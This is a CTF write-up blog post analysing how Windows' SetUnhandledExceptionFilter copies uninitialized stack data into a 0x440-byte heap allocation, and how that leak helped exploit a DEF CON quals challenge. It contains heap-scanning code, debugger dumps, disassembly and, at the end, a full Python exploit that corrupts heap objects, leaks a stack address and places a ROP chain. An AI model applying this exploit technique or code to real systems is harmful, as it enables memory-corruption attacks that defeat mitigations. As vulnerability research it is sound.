Disclosing stack data (stack frames, GS cookies etc.) from the default heap on Windows

In the previous blog post, I discussed a modest technique to “fix” the default process heap in order to prevent various Windows API functions from crashing, by replacing the corresponding field in PEB (Process Environment Block) with a freshly created heap. This of course assumes that the attacker has already achieved arbitrary code execution, or is at least able to use ROP and knows the base addresses of some vital system DLLs. It is likely the last exploitation technique one would use before gaining full control over the vulnerable application or system, and was indeed used by Gynvael and me while wrapping up the exploitation of the easier challenge during this year’s DEF CON CTF qualifiers which took place in May.

However, before we could even reach that stage, I had to overcome a few other significant obstacles, the hardest of which was converting the available primitives into a hijacked control flow. Following hours of trying to reproduce the same heap layout on the organizers’ and my own platform (exploiting the bugs was in fact the easiest part), I finally managed to achieve close to arbitrary memory read and write capabilities. By that point, I knew the location of the heap, the challenge image base and NTDLL.DLL image base, where I could freely read from and write to. On the other hand, the task itself did not make it easy to get controlled EIP even with such powerful primitives, as it didn’t store plain-text function pointers, virtual objects or any data directly controlling the execution flow on either the heap or in static memory. This meant that a generic technique had to be used instead.

All of the ideas I tested throughout Day 2 of the competition fell through. The CRT-related function pointers in static memory I could potentially overwrite were encoded with the EncodePointer API. There were some vtable pointers on the heap used during program termination, but I was unable to get them positioned in a similar fashion both locally and remotely, and I strived to write an exploit that I could test in both environments (a fellow CTF player, Dougall, didn’t care and just blindly exploited the bug on the task server). I had a pretty decent idea centered around a list of destructor pointers saved in NTDLL, but in a last attempt to find a simpler and more elegant solution, I decided to check whether a stack address could somehow be leaked from the heap, which I could read without any limits.

In theory, storing stack addresses on the heap doesn’t make any sense. The heap is designed for long-lasting allocations that can be passed between various execution contexts within a single process (functions, threads etc.), while stack objects are only valid for the duration of a function execution (or even shorter). Thus, we should not typically observe any stack addresses placed on the heap, or else they would indicate some very poor programming practices. However, Windows is a complex system full of unexpected quirks, so there might still be many non-obvious reasons for such behavior, and all I really needed was a single stack address at a roughly consistent position on the heap. With this assumption, I wrote the following simple program to scan through the entire default process heap in search of the desired addresses:

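#include <windows.h>
#include <tchar.h>

#include <cstdio>
#include <cstring>

int __cdecl _tmain() {
  // Query the memory region that starts at the default process heap handle.
  // The call is made outside of assert(), so it also runs in NDEBUG builds.
  MEMORY_BASIC_INFORMATION mbi = { 0 };
  if (VirtualQuery(GetProcessHeap(), &mbi, sizeof(mbi)) == 0 ||
      (mbi.State & MEM_COMMIT) == 0) {
    printf("[-] Unable to query the default process heap.\n");
    return 1;
  }

  SIZE_T heap_start = (SIZE_T)GetProcessHeap();
  SIZE_T heap_end = heap_start + mbi.RegionSize;
  SIZE_T stack_object;
  // Page containing a local variable, i.e. the stack page currently in use.
  SIZE_T stack_address = (((SIZE_T)&stack_object) & ~(SIZE_T)0xfff);

  // %Ix is the MSVC length modifier for pointer-sized integers.
  printf("Heap start:     %Ix\n", heap_start);
  printf("Heap end:       %Ix\n", heap_end);
  printf("Stack address:  %Ix (%p)\n", stack_address, &stack_object);

  // Treat every pointer-sized slot of the region as a potential stack pointer.
  for (SIZE_T heap_address = heap_start; heap_address < heap_end; heap_address += sizeof(SIZE_T)) {
    SIZE_T heap_data;
    memcpy(&heap_data, (LPVOID)heap_address, sizeof(SIZE_T));

    if ((heap_data & ~(SIZE_T)0xfff) == stack_address) {
      printf("[+] Found address %Ix at heap location %Ix.\n", heap_data, heap_address);
    }
  }

  return 0;
}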

When I built and started the program, I saw an output similar to the following:

Heap start:     450000
Heap end:       4b1000
Stack address:  22f000 (0022FD24)
[+] Found address 22fd10 at heap location 4b06b4.
[+] Found address 22fd10 at heap location 4b06e0.
[+] Found address 22fd50 at heap location 4b06ec.
[+] Found address 22fd20 at heap location 4b0714.
[+] Found address 22fd48 at heap location 4b0718.
[+] Found address 22fda4 at heap location 4b071c.

Bingo! It turned out that around six stack addresses could be reliably found next to each other on the heap of a 32-bit process. I took advantage of this fact to disclose one of them in my exploit, making it possible to write the ROP chain directly to the stack, and saving myself a lot of time and trouble related to going through more levels of indirection, such as stack pivoting. The full exploit code I used during the CTF (excluding the ROP chain and crypto functions) can be found at the bottom of the post.
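The same check can also be run offline against a heap dump obtained through a read primitive. The snippet below is only a rough sketch in Python 3 and not part of the exploit: the function name and the SAMPLE_ROWS constant are made up for illustration, and the sample bytes are the four dump rows starting at 004b06b0 of the test program's heap, shown in the Analysis section.

```python
import struct

PAGE_MASK = 0xFFFFF000  # 32-bit equivalent of ~0xfff

# Rows 004b06b0..004b06ef of the test program's heap (illustrative sample).
SAMPLE_ROWS = bytes.fromhex(
    "8c6c404310fd220047fd2001d8024b00"
    "f8044b000000000057fd200100000000"
    "0d00000000000000d8024b0000010000"
    "10fd2200a3ea20015896230150fd2200"
)


def find_page_pointers(dump, dump_base, page):
    """Return (location, value) pairs for every aligned DWORD in `dump`
    that points into the 4 KiB page starting at `page`."""
    hits = []
    # Walk the dump in 4-byte steps, ignoring a trailing partial DWORD.
    for offset in range(0, len(dump) - len(dump) % 4, 4):
        (value,) = struct.unpack_from("<I", dump, offset)
        if value & PAGE_MASK == page:
            hits.append((dump_base + offset, value))
    return hits


if __name__ == "__main__":
    for location, value in find_page_pointers(SAMPLE_ROWS, 0x4b06b0, 0x22f000):
        print("[+] Found address %x at heap location %x." % (value, location))
```

Run on the sample rows, it reports the same first three hits as the C++ program (4b06b4, 4b06e0 and 4b06ec). In a real attack the stack page is of course not known up front, so the page argument would have to be replaced by some heuristic.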

In the following sections, I go through a brief analysis of where these addresses came from and what they were doing there.

Analysis

It’s definitely great that the addresses showed up on the process heap and enabled me to solve the CTF task. During the competition, I didn’t care about the origin of the data or how it could possibly end up there, but I sure had to find the root cause afterwards. Such unusual behavior could be a sign of something fishy or just plain interesting going on in either the C runtime library or the Windows API. Both my test program and the challenge were built with Microsoft Visual C++, so it also might have been something specific to the compiler.

To start things off, let’s check the heap location where the addresses were found to obtain some details about the containing allocation:

0:000> !heap -x 4b06b4
Entry     User      Heap      Segment       Size  PrevSize  Unused    Flags
-----------------------------------------------------------------------------
004b04f8  004b0500  00450000  00450000       448       228         8  busy

We now know that the chunk is 0x440 bytes in size (the reported entry size of 0x448 minus the 8 unused bytes), and that all stack addresses are contained within it. Let’s dump the memory region:

0:000> db 004b0500 004b0500+440-1
004b0500  00 00 1f 01 00 f0 04 00-00 00 00 01 48 00 4a 00  ............H.J.
004b0510  14 05 4b 00 5c 00 44 00-65 00 76 00 69 00 63 00  ..K.\.D.e.v.i.c.
004b0520  65 00 5c 00 48 00 61 00-72 00 64 00 64 00 69 00  e.\.H.a.r.d.d.i.
004b0530  73 00 6b 00 56 00 6f 00-6c 00 75 00 6d 00 65 00  s.k.V.o.l.u.m.e.
004b0540  32 00 5c 00 74 00 65 00-73 00 74 00 5f 00 61 00  2.\.t.e.s.t._.a.
004b0550  70 00 70 00 2e 00 65 00-78 00 65 00 00 00 ae af  p.p...e.x.e.....
004b0560  b0 b1 b2 b3 b4 b5 b6 b7-b8 b9 ba bb bc bd be bf  ................
004b0570  e0 e1 e2 e3 e4 e5 e6 e7-e8 e9 ea eb ec ed ee ef  ................
004b0580  f0 f1 f2 f3 f4 f5 f6 d7-f8 f9 fa fb fc fd fe df  ................
004b0590  e0 e1 e2 e3 e4 e5 e6 e7-e8 e9 ea eb ec ed ee ef  ................
004b05a0  f0 f1 f2 f3 f4 f5 f6 f7-f8 f9 fa fb fc fd fe ff  ................
004b05b0  20 01 02 03 04 05 06 07-08 09 0a 0b 0c 0d 0e 0f   ...............
004b05c0  10 11 12 13 14 15 16 17-18 19 1a 1b 1c 1d 1e 1f  ................
004b05d0  20 21 22 23 24 25 26 27-28 29 2a 2b 2c 2d 2e 2f   !"#$%&'()*+,-./
004b05e0  30 31 32 33 34 35 36 37-38 39 3a 3b 3c 3d 3e 3f  0123456789:;<=>?
004b05f0  40 41 42 43 44 45 46 47-48 49 4a 4b 4c 4d 4e 4f  @ABCDEFGHIJKLMNO
004b0600  50 51 52 53 54 55 56 57-58 59 5a 5b 5c 5d 5e 5f  PQRSTUVWXYZ[\]^_
004b0610  60 61 62 63 64 65 66 67-68 69 6a 6b 6c 6d 6e 6f  `abcdefghijklmno
004b0620  70 71 72 73 74 75 76 77-78 79 7a 7b 7c 7d 7e 7f  pqrstuvwxyz{|}~.
004b0630  80 81 82 83 84 85 86 87-88 89 8a 8b 8c 8d 8e 8f  ................
004b0640  90 91 92 93 94 95 96 97-98 99 9a 9b 9c 9d 9e 9f  ................
004b0650  a0 a1 a2 a3 a4 a5 a6 a7-a8 a9 aa ab ac ad ae af  ................
004b0660  b0 b1 b2 b3 b4 b5 b6 b7-b8 b9 ba bb bc bd be bf  ................
004b0670  c0 c1 c2 c3 c4 c5 c6 c7-c8 c9 ca cb cc cd ce cf  ................
004b0680  d0 d1 d2 d3 d4 d5 d6 d7-d8 d9 da db dc dd de df  ................
004b0690  e0 e1 e2 e3 e4 e5 e6 e7-e8 e9 ea eb ec ed ee ef  ................
004b06a0  f0 f1 f2 f3 f4 f5 f6 f7-f8 f9 fa fb fc fd fe ff  ................
004b06b0  8c 6c 40 43 10 fd 22 00-47 fd 20 01 d8 02 4b 00  .l@C..".G. ...K.
004b06c0  f8 04 4b 00 00 00 00 00-57 fd 20 01 00 00 00 00  ..K.....W. .....
004b06d0  0d 00 00 00 00 00 00 00-d8 02 4b 00 00 01 00 00  ..........K.....
004b06e0  10 fd 22 00 a3 ea 20 01-58 96 23 01 50 fd 22 00  .."... .X.#.P.".
004b06f0  d7 fa 20 01 0d 00 00 00-05 fb 20 01 04 6d 40 43  .. ....... ..m@C
004b0700  00 00 00 00 18 e3 22 01-00 00 00 00 88 af 4a 00  ......".......J.
004b0710  00 01 00 00 20 fd 22 00-48 fd 22 00 a4 fd 22 00  .... .".H."...".
004b0720  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
004b0730  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
004b0740  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
[...]
004b0910  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
004b0920  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
004b0930  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................

Interesting! We can already notice here that at offset 0xc there is a UNICODE_STRING header (length 0x48, maximum length 0x4a), followed at offset 0x14 by the unicode path to our executable file. After the path comes some memory which doesn’t make much sense, but contains several instances of stack addresses (in the rows starting at 004b06b0, 004b06e0 and 004b0710). The question is: where does this data come from?
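To make the layout of the beginning of the chunk easier to follow, here is a small Python 3 sketch that decodes it. It assumes the 32-bit layout visible in the dump above (a UNICODE_STRING header at offset 0xc: two 16-bit lengths and a 32-bit buffer pointer, with the characters right behind it). The names parse_section_name and SAMPLE_CHUNK are mine, and the sample holds the first six rows of the dump.

```python
import struct

NAME_OFFSET = 0x0C  # offset of the UNICODE_STRING header within the chunk

# Rows 004b0500..004b055f of the dump (illustrative sample).
SAMPLE_CHUNK = bytes.fromhex(
    "00001f0100f004000000000148004a00"
    "14054b005c0044006500760069006300"
    "65005c00480061007200640064006900"
    "73006b0056006f006c0075006d006500"
    "32005c0074006500730074005f006100"
    "700070002e006500780065000000aeaf"
)


def parse_section_name(chunk):
    """Return (path, buffer pointer, offset of the first byte after the name)."""
    # 32-bit UNICODE_STRING: USHORT Length, USHORT MaximumLength, PWSTR Buffer.
    length, max_length, buffer_ptr = struct.unpack_from("<HHI", chunk, NAME_OFFSET)
    name_start = NAME_OFFSET + 8
    path = chunk[name_start:name_start + length].decode("utf-16-le")
    # MaximumLength also covers the terminating null character.
    trailing_offset = name_start + max_length
    return path, buffer_ptr, trailing_offset


if __name__ == "__main__":
    path, buffer_ptr, trailing = parse_section_name(SAMPLE_CHUNK)
    print("path=%s buffer=%x trailing data starts at +0x%x" % (path, buffer_ptr, trailing))
```

For the sample, the data that "doesn’t make much sense" starts at offset 0x5e, which is where the ae af bytes sit in the row at 004b0550.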

While investigating this further, I figured out that the allocation already existed by the time the main() function got called, but was not yet present at the program entry point. This meant that it was created in the CRT prologue added by the compiler. Hence, I began looking for the culprit starting with the wmainCRTStartup() routine. Going deeper and deeper into the rabbit hole, I eventually arrived at the following stack trace:

0:000> kb
ChildEBP RetAddr  Args to Child              
002ef7ec 0128e773 0128585c 002ef80c 0128d053 kernel32!SetUnhandledExceptionFilter
002ef7f8 0128d053 0128585c 01288f6f 00000000 test_app!__crtSetUnhandledExceptionFilter+0xc [f:\dd\vctools\crt\crtw32\misc\winapisupp.c @ 199]
002ef800 01288f6f 00000000 002ef81c 01288dc5 test_app!__CxxSetUnhandledExceptionFilter+0xa [f:\dd\vctools\crt\crtw32\eh\unhandld.cpp @ 60]
002ef80c 01288dc5 012ae208 012ae524 002ef85c test_app!_initterm_e+0x17 [f:\dd\vctools\crt\crtw32\startup\crt0dat.c @ 1006]
002ef81c 01288166 00000001 7fb872f3 00000000 test_app!_cinit+0x39 [f:\dd\vctools\crt\crtw32\startup\crt0dat.c @ 298]
002ef85c 76db338a 7efde000 002ef8a8 77ce9902 test_app!__tmainCRTStartup+0xd6 [f:\dd\vctools\crt\crtw32\startup\crt0.c @ 237]
002ef868 77ce9902 7efde000 7b21f23f 00000000 kernel32!BaseThreadInitThunk+0xe
002ef8a8 77ce98d5 01285366 7efde000 00000000 ntdll!__RtlUserThreadStart+0x70
002ef8c0 00000000 01285366 7efde000 00000000 ntdll!_RtlUserThreadStart+0x1b

It is typical of a C++ compiler to install a generic unhandled exception filter, whose purpose is to deal with several C++ specific exceptions. This is accomplished through the __CxxSetUnhandledExceptionFilter function, which is registered as a constructor and therefore called by _initterm_e before any user code takes control. By itself, it only consists of a simple SetUnhandledExceptionFilter API call. The question remains: why and how does the documented function “pollute” the heap with data that shouldn’t really be there?

If you take a look at the specific implementation of the API, you will notice that kernel32.dll uses two static pointers to describe the current top level filter: BasepFilterInfo pointing at a heap-allocated structure of size 0x440 containing some basic properties of the function, and BasepCurrentTopLevelFilter pointing at the function itself (in an encoded form). The simplified logic of SetUnhandledExceptionFilter is as follows:

Allocate a ~0x220 byte long structure on the stack, let’s call it LocalFilterInfo, without any initialization.

.text:7DD78791 ; LPTOP_LEVEL_EXCEPTION_FILTER __stdcall SetUnhandledExceptionFilter(LPTOP_LEVEL_EXCEPTION_FILTER lpTopLevelExceptionFilter)
.text:7DD78791                 public _SetUnhandledExceptionFilter@4
.text:7DD78791 _SetUnhandledExceptionFilter@4 proc near ; DATA XREF: .text:off_7DE201B0
.text:7DD78791
.text:7DD78791 LocalFilterInfo = dword ptr -220h
.text:7DD78791 lpTopLevelExceptionFilter= dword ptr  8
.text:7DD78791
...
.text:7DD78791
.text:7DD78791                 mov     edi, edi
.text:7DD78793                 push    ebp
.text:7DD78794                 mov     ebp, esp
.text:7DD78796                 sub     esp, 220h

Fill the structure with information using an internal BasepFillUEFInfo function.

.text:7DD787A9                 lea     eax, [ebp+LocalFilterInfo]
.text:7DD787AF                 push    eax             ; int
.text:7DD787B0                 push    esi             ; lpAddress
.text:7DD787B1                 call    _BasepFillUEFInfo@8 ; BasepFillUEFInfo(x,x)

If the BasepFilterInfo pointer is NULL, allocate a memory region of size 0x440 on the heap:

.text:7DD787C6                 mov     ebx, _BasepFilterInfo
.text:7DD787CC                 test    ebx, ebx
.text:7DD787CE                 jz      loc_7DD788E3
[...]
.text:7DD788E3                 call    _KernelBaseGetGlobalData@0 ; KernelBaseGetGlobalData()
.text:7DD788E8                 mov     eax, [eax+2Ch]
.text:7DD788EB                 mov     ecx, large fs:18h
.text:7DD788F2                 push    440h            ; Size
.text:7DD788F7                 add     eax, 2C0000h
.text:7DD788FC                 push    eax             ; Flags
.text:7DD788FD                 mov     eax, [ecx+30h]
.text:7DD78900                 push    dword ptr [eax+18h] ; HeapHandle
.text:7DD78903                 call    ds:__imp__RtlAllocateHeap@12 ; RtlAllocateHeap(x,x,x)

Copy the stack-based LocalFilterInfo structure into the heap-based BasepFilterInfo object, and change the BasepCurrentTopLevelFilter pointer to the new value.

As you have surely guessed by now, the problem is rooted in the fact that the LocalFilterInfo stack object is not initialized with zeros. While the overall layout of the structure is quite simple, it is sufficient to observe that it contains a buffer for the unicode name of the image which the filter function resides in, at offset 0xc. The buffer is filled via a call to NtQueryVirtualMemory with the MemorySectionName information class inside the BasepFillUEFInfo function:

.text:7DD788BE                 push    0               ; ReturnLength
.text:7DD788C0                 push    212h            ; MemoryInformationLength
.text:7DD788C5                 add     esi, 0Ch
.text:7DD788C8                 push    esi             ; MemoryInformation
.text:7DD788C9                 push    MemorySectionName ; MemoryInformationClass
.text:7DD788CB                 push    [ebp+lpAddress] ; BaseAddress
.text:7DD788CE                 push    0FFFFFFFFh      ; ProcessHandle
.text:7DD788D0                 call    edi ; NtQueryVirtualMemory(x,x,x,x,x,x)
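The effect of the missing initialization can be modelled in a few lines of Python 3. This is a toy model under simplifying assumptions, not a reimplementation of kernel32.dll: the stack frame is a plain byte buffer, only the name buffer at offset 0xc is written (the other fields of the structure are ignored), and the function names are invented for the illustration.

```python
import struct

STRUCT_SIZE = 0x220  # size of LocalFilterInfo on the stack
NAME_OFFSET = 0x0C   # where the section name buffer starts


def fill_info(frame, name_bytes):
    """Model of the fill step: only the used part of the name buffer is written."""
    frame[NAME_OFFSET:NAME_OFFSET + len(name_bytes)] = name_bytes


def set_filter(stale_stack, name_bytes, zero_first=False):
    """Return the bytes that end up on the heap for a frame reusing `stale_stack`."""
    frame = bytearray(stale_stack[:STRUCT_SIZE])  # leftovers of earlier calls
    if zero_first:
        frame[:] = bytes(STRUCT_SIZE)             # the initialization that is missing
    fill_info(frame, name_bytes)
    return bytes(frame)                           # copied verbatim to the heap


if __name__ == "__main__":
    name = "\\Device\\HarddiskVolume2\\test_app.exe".encode("utf-16-le") + b"\x00\x00"
    stale = struct.pack("<I", 0x22fd10) * (STRUCT_SIZE // 4)  # pretend old stack data
    leaked = set_filter(stale, name)
    print("stale pointer survives:", struct.pack("<I", 0x22fd10) in leaked[NAME_OFFSET + len(name):])
```

With zero_first=True the tail of the structure comes out as zeros, which is roughly what zeroing the local structure before filling it would achieve.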

If the memory section name is shorter than ~260 characters (it typically is), the rest of the buffer will remain uninitialized, and will be copied in such form to the process heap. Depending on the caller and prior execution flow, the leftover stack data may contain a multitude of interesting kinds of data, including return addresses (disclosing image bases), stack frames (in case of 32-bit programs), stack cookies, and potentially other sensitive data that should normally never make it to the heap in the first place. If an attacker is able to leak memory from the default process heap (through some information disclosure vulnerability) and manages to find the specific allocation made by kernel32.dll, they might be able to use this behavior to their advantage, and disclose data facilitating further exploitation or completely defeating some exploit mitigations. The allocation is especially easy to recognize thanks to the fixed size, and the fact that it contains a path to the image currently holding the top level filter.
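Once the allocation has been located, sorting the leftover values by the regions the attacker already knows about is a quick way to see what has been leaked. The Python 3 sketch below illustrates the idea. The heap range is taken from the output of the test program, while the image range is purely an assumption made for this example (the post never states the image base of test_app.exe), and the function name is mine.

```python
import struct

# Region map for the test program: the heap range comes from its output,
# the image range is a hypothetical guess used only for this example.
KNOWN_REGIONS = {
    "heap": (0x00450000, 0x004B1000),
    "image": (0x01200000, 0x01240000),
}


def classify_dwords(leftover, regions):
    """Label every non-zero aligned DWORD with the first region containing it,
    or with "unknown" if it falls outside of all known regions."""
    labelled = []
    for offset in range(0, len(leftover) - len(leftover) % 4, 4):
        (value,) = struct.unpack_from("<I", leftover, offset)
        if value == 0:
            continue
        label = "unknown"
        for name, (start, end) in regions.items():
            if start <= value < end:
                label = name
                break
        labelled.append((offset, value, label))
    return labelled


if __name__ == "__main__":
    row = bytes.fromhex("8c6c404310fd220047fd2001d8024b00")  # dump row 004b06b0
    for offset, value, label in classify_dwords(row, KNOWN_REGIONS):
        print("+0x%02x  %08x  %s" % (offset, value, label))
```

Values labelled "image" are return address candidates, while the "unknown" ones are where stack addresses and possibly cookie-derived values would show up, so they still need to be told apart by other means.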

And so, this small detail in the implementation of the SetUnhandledExceptionFilter API called by Microsoft’s CRT at process startup made it possible for me to solve a DEF CON CTF quals challenge that would otherwise be much more difficult to pwn. As the technique requires a very specific set of preconditions (being able to read from the default process heap, not already having a vector for hijacking execution etc.), I don’t expect it to be useful in many scenarios, but I still think it’s interesting enough to keep in mind. Frankly, I also find it quite amusing that every VC++ compiled program starts with ~500 bytes of uninitialized stack data copied to the heap, before it even executes any code of its own.

On a side note, I find it likely (although it’s not confirmed) that this behavior was introduced almost exactly 10 years ago in the MS06-051 bulletin, which included a fix for a design flaw around the SetUnhandledExceptionFilter function. The research was documented in detail in the “Exploiting the Otherwise Non-Exploitable on Windows” article released by Skywing and skape, and it motivated Microsoft to add extra security checks to the API in question, in order to make sure the original flaw (which couldn’t be eliminated without a complete redesign) wouldn’t lead to accepting a dangling pointer as a valid exception filter. If you’re not familiar with the paper, I strongly encourage you to read it. :)

easier challenge exploit code

import os
import select
import socket
import struct
import sys
import telnetlib
import time
from encdec import *
import pwnbase

host = "easier_55605f781f413a2b699377ced27617f0.quals.shallweplayaga.me"
port = 8989

def read_until(s, text):
  buffer = ""
  while len(buffer) < len(text):
    buffer += s.recv(1)
  while buffer[-len(text):] != text:
    buffer += s.recv(1)
  return buffer[:-len(text)]

##########################################################################
# Exploit start
##########################################################################

def dd(x):
  return struct.pack("<I", x)

def create_object(s, ints):
  op = enc_chunk(1, len(ints) * 4)
  s.sendall("%d %d\n" % (op[0], op[1]))
  s.sendall(" ".join(map(lambda x: str(x), ints)) + "\n")

def print_object(s, idx):
  op = enc_chunk(2, idx)
  s.sendall("%d %d\n" % (op[0], op[1]))

def free_object(s, idx):
  op = enc_chunk(3, idx)
  s.sendall("%d %d\n" % (op[0], op[1]))

def copy_object(s, where, idx):
  assert(where == 0 or where == 64)
  op = enc_chunk(5, (idx << 8) | where)
  s.sendall("%d %d\n" % (op[0], op[1]))

def create_systeminfo_object(s):
  op = enc_chunk(8, 0)
  s.sendall("%d %d\n" % (op[0], op[1]))

def dump_to_dwords(text):
  dwords = []
  for _ in map(lambda x: int(x, 16), text.split()):
    dwords.append(_)
  return dwords

def encode_dwords(dwords):
  if (len(dwords) % 2) == 1:
    dwords += [0xcccccccc]

  encoded = []
  i = 0
  while i < len(dwords):
    encoded += list(enc_chunk(dwords[i], dwords[i + 1]))
    i += 2
  return encoded

def decode_dwords(dwords):
  decoded = []
  i = 0
  while i < len(dwords):
    decoded += list(dec_chunk(dwords[i], dwords[i + 1]))
    i += 2
  return decoded

def bytes_to_dwords(data):
  dwords = []
  i = 0
  while i < len(data):
    dwords += [struct.unpack("<I", data[i: i + 4])[0]]
    i += 4
  return dwords

if len(sys.argv) > 1:
  host = sys.argv[1]

if len(sys.argv) > 2:
  port = int(sys.argv[2])

s = socket.socket()
s.connect((host, port))

read_until(s, "\n")
s.sendall("3 4 5 6\n")

# Create two objects #0 and #1 to be placed next to each other and before the pointer array.
DWORDS = 16
create_object(s, encode_dwords([0xcccccccc] * DWORDS))
create_object(s, encode_dwords([0xcccccccc] * DWORDS))

# Create a large object #2 to have its size moved to #0.
create_object(s, [1] * 20)

# Move the size of object #2 into #0, so we get out-of-bounds access to it.
copy_object(s, 0, 2)

# Print out the contents of adjacent heap memory of object #0.
print_object(s, 0)
data = read_until(s, "\n")
print "------------------------------- Object #0 data dumped:\n%s" % data

heap_dwords = dump_to_dwords(data)

# Create an object #3 to overwrite #0, which will overwrite #1's size field from 0x40 to the desired value.
NEW_SIZE = 0x1900
create_object(s, encode_dwords(heap_dwords[:19] + [NEW_SIZE]))

# Overwrite object #0, resulting in #1's modified size.
copy_object(s, 0, 3)

# Print out #0 to make sure it was correctly overwritten.
print_object(s, 0)
data = read_until(s, "\n")
print "------------------------------- Object #0 data dumped with overwritten #1 size:\n%s" % data

# Insert ROP into objects #4 and #5 for future exploitation (it's convenient to leak the object's address now).
NTDLL_BASE = 0x77180000
IMAGE_BASE = 0x01090000
rop = pwnbase.my_little_pwnie_rop_is_magic(0, NTDLL_BASE, IMAGE_BASE, "key.txt", 0)
rop = bytes_to_dwords(rop.ljust(len(rop) + (4 - (len(rop) & 3)), "\xcc"))
create_object(s, encode_dwords([0xaaaaaaaa] * 45 + rop))

# Create object #5 with length 8, which we will later use to free() it and transfer the size to object #0.
create_object(s, encode_dwords([1] * 2))

# Get the data of object #1, which will leak the location of the pointer array, ROP buffer, etc.
print_object(s, 1)
data = read_until(s, "\n")
print "------------------------------- Heap data adjacent to object #1 dumped:\n%s" % data

dwords = dump_to_dwords(data)

OBJECT_0_ADDR = None
OBJECT_1_ADDR = None
OBJECT_5_ADDR = None
STACK_ARRAY_OFFSET = None
ROP_ADDR = None

i = 0
while i + 3 < len(dwords):
  if (dwords[i + 1] - dwords[i] == 0x50) and (dwords[i + 2] - dwords[i + 1] == 0x50) and (dwords[i + 3] - dwords[i + 2] == 0):
    OBJECT_0_ADDR = dwords[i]
    OBJECT_1_ADDR = dwords[i + 1]
    OBJECT_5_ADDR = dwords[i + 5]
    STACK_ARRAY_OFFSET = i + 0x14
    ROP_ADDR = dwords[i + 4]
    break
  i += 1

if OBJECT_0_ADDR == None:
  print "[-] Pointer array not found in the dumped heap."
  sys.exit(1)

print "------------------------------- Heap pointer array found. Data:"
print "  Object #0 address:  %x" % OBJECT_0_ADDR
print "  Object #1 address:  %x" % OBJECT_1_ADDR
print "  Object #5 address:  %x" % OBJECT_5_ADDR
print "  Stack array offset: %d" % STACK_ARRAY_OFFSET
print "  ROP address:        %x\n" % ROP_ADDR

assert((STACK_ARRAY_OFFSET >= 1200) and (STACK_ARRAY_OFFSET < 1600))

# Free object #0 so that we can reset its size.
copy_object(s, 0, 0)

# Create object #6, which will be reallocated to the buffer of #0 (hopefully).
create_object(s, encode_dwords([0xcccccccc] * DWORDS))

# Insert the large size of #1 into #0, so we can use it to overwrite the pointer array.
copy_object(s, 0, 1)

# Print out the contents of the object again, so that we can get the most recent heap metadata to restore it when overwriting entry #0 in pointer array.
print_object(s, 0)
data = read_until(s, "\n")
print "------------------------------- Heap data adjacent to object #0 with large size:\n%s" % data

dwords = dump_to_dwords(data)

# Create objects #7, #8, #9, #10 with parts of the original heap metadata and overwritten entry #0 pointer in the pointer array at the end.
assert(dwords[STACK_ARRAY_OFFSET] == OBJECT_0_ADDR)

dwords[STACK_ARRAY_OFFSET + 0] = OBJECT_0_ADDR + (STACK_ARRAY_OFFSET * 4)
dwords[STACK_ARRAY_OFFSET + 7] = OBJECT_5_ADDR
dwords[STACK_ARRAY_OFFSET + 12] = OBJECT_0_ADDR - 0x800 + (269 * 4) + 4

create_object(s, encode_dwords(dwords[0: 400]))
create_object(s, encode_dwords(dwords[404: 804]))
create_object(s, encode_dwords(dwords[808: 1208]))
create_object(s, encode_dwords(dwords[1212:]))

# Once more create a ROP entry at #11.
create_object(s, encode_dwords(bytes_to_dwords("\xcc" * 304)))

# Overwrite entry #0 in the pointer array at offset STACK_ARRAY_OFFSET.
copy_object(s, 0, 7)

# Print out the dumped data.
print_object(s, 12)
dwords = dump_to_dwords(read_until(s, "\n"))
print "------------------------------- Pointer array:\n%s" % (" ".join(map(lambda x: "%.8x" % x, dwords)))

assert(dwords[6] == 0xfffffffe)
STACK_ADDR = dwords[7]

print "[+] Leaked stack address: %x" % STACK_ADDR

# Create object #12 with fake pointer array.
ptrs = [STACK_ADDR - 180] * 2
create_object(s, encode_dwords(ptrs))

# Copy object #12 into #0, modifying the pointer array.
copy_object(s, 0, 12)

# Copy ROP into the stack at object #0.
copy_object(s, 0, 4)
copy_object(s, 0, 4)

# Give control to user
t = telnetlib.Telnet()
t.sock = s
t.interact()
